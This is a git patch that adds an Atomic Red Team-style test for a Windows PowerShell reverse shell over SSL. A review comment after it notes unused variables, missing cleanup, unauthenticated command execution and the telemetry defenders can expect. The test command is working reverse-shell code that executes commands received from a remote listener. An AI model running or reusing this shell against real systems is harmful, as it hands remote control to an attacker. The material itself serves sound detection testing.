From 904b5a59a42df3dfca30e19d1ca0867964933dbc Mon Sep 17 00:00:00 2001
From: MrOrOneEquals1
Date: Fri, 24 Jan 2020 08:24:57 -0700
Subject: [PATCH] T1032 - Add OpenSSL C2 (#795)
* T1032 Add OpenSSL C2 Test
Co-authored-by: Carrie Roberts
---
atomics/T1032/T1032.yaml | 47 ++++++++++++++++++++++++++++++++++++++++
1 file changed, 47 insertions(+)
create mode 100644 atomics/T1032/T1032.yaml
diff --git a/atomics/T1032/T1032.yaml b/atomics/T1032/T1032.yaml
new file mode 100644
index 00000000..2a64f37e
--- /dev/null
+++ b/atomics/T1032/T1032.yaml
@@ -0,0 +1,47 @@
+---
+attack_technique: T1032
+display_name: Standard Cryptographic Protocol
+
+atomic_tests:
+ - name: OpenSSL C2
+ description: |
+ Thanks to @OrOneEqualsOne for this quick C2 method.
+ This is to test to see if a C2 session can be established using an SSL socket.
+ More information about this technique, including how to set up the listener, can be found here:
+ https://medium.com/walmartlabs/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926
+ supported_platforms:
+ - windows
+ input_arguments:
+ server_ip:
+ description:
+ IP of the external server
+ type: String
+ default: 127.0.0.1
+ server_port:
+ description:
+ The port to connect to on the external server
+ type: String
+ default: 443
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ $server_ip = #{server_ip}
+ $server_port = #{server_port}
+ $socket = New-Object Net.Sockets.TcpClient('#{server_ip}', #{server_port})
+ $stream = $socket.GetStream()
+ $sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
+ $sslStream.AuthenticateAsClient('fake.domain', $null, "Tls12", $false)
+ $writer = new-object System.IO.StreamWriter($sslStream)
+ $writer.Write('PS ' + (pwd).Path + '> ')
+ $writer.flush()
+ [byte[]]$bytes = 0..65535|%{0};
+ while(($i = $sslStream.Read($bytes, 0, $bytes.Length)) -ne 0)
+ {$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
+ $sendback = (iex $data | Out-String ) 2>&1;
+ $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
+ $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
+ $sslStream.Write($sendbyte,0,$sendbyte.Length);$sslStream.Flush()}
+
+
+
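Review bot: The first two lines of `command`, `$server_ip = #{server_ip}` and `$server_port = #{server_port}`, substitute the arguments unquoted and are never read afterwards, because the `TcpClient` call interpolates `'#{server_ip}'` itself; with the default `127.0.0.1` the first assignment is likely a PowerShell parse error, so I would drop both lines, or quote the value and use the variables in the constructor. The stream accepts any server certificate (the `{$True}` callback, with `'fake.domain'` as target host) and hands whatever it reads to `iex`, so the listener is unauthenticated and whoever answers on that address runs commands on the test host; the `description` should state that `server_ip` must be a listener the tester controls on an isolated network. The socket and `SslStream` are never closed and the executor has no `cleanup_command`, so an interrupted run leaves the connection to process teardown; wrapping the loop in `try { … } finally { $sslStream.Dispose(); $socket.Close() }` would release it. For defenders running the test, the description could also name the telemetry to expect, for example PowerShell script block logging (event 4104) recording the `SslStream` and `iex` calls.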